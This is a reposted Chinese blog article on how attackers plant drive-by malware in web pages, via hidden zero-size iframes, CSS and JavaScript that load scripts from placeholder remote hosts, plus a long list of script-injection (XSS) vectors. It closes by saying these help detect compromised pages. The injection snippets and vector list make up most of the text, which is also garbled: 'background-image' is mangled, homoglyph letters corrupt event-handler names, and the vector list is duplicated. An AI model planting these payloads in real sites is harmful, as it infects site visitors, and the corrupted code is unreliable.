1.浮动框架<iframe>
<iframe src="***的地址" height=0 width=0 frameborder=0 scrolling="no"></iframe>
2.CSS挂马
<link rel="stylesheet" href="http://xxx.xxxx.xx/css.css" type="text/css">
css.css是链接外部的文件,把这个文件改成修改好的本马文件。
在css文件中加入如下代码:
body{backrgound-p_w_picpath:url('javascript:document.write("<script src="http://xxx.xxx.xxx/css.js"></script>")')意思是利用javascript文档对象的 write方法写入url地址中的内容.其中css.js的内容:
<script src="网页***地址"></script>
<script src="网页***地址"></script>
3.js隐藏挂马:
<script src=" [url]http://xxx.xxx.xxx/mm.js[/url]"></script> 这句是挂到网页上
其中mm.js内容为:
document.write('<Iframe src="网页***地址" width="0" height="0" scrolling="no" frameborder="0"></iframe>');
<script src=" [url]http://xxx.xxx.xxx/mm.js[/url]"></script> 这句是挂到网页上
其中mm.js内容为:
document.write('<Iframe src="网页***地址" width="0" height="0" scrolling="no" frameborder="0"></iframe>');
把javascript脚本插入WEB页面的不同方法:
<a href="javascript#[code]">
<div οnmοuseοver="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]"> [IE]
<input type="p_w_picpath" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body οnlοad="[code]">
<div style="background-p_w_picpath: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<script>[code]</script>
<img src="blah"οnmοuseοver="[code]">
<img src="blah>" οnmοuseοver="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
理解了这些我们就能分析出网页中是不是被别人挂了马。
<a href="javascript#[code]">
<div οnmοuseοver="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]"> [IE]
<input type="p_w_picpath" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body οnlοad="[code]">
<div style="background-p_w_picpath: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<script>[code]</script>
<img src="blah"οnmοuseοver="[code]">
<img src="blah>" οnmοuseοver="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
理解了这些我们就能分析出网页中是不是被别人挂了马。
转载于:https://blog.51cto.com/iixox/37597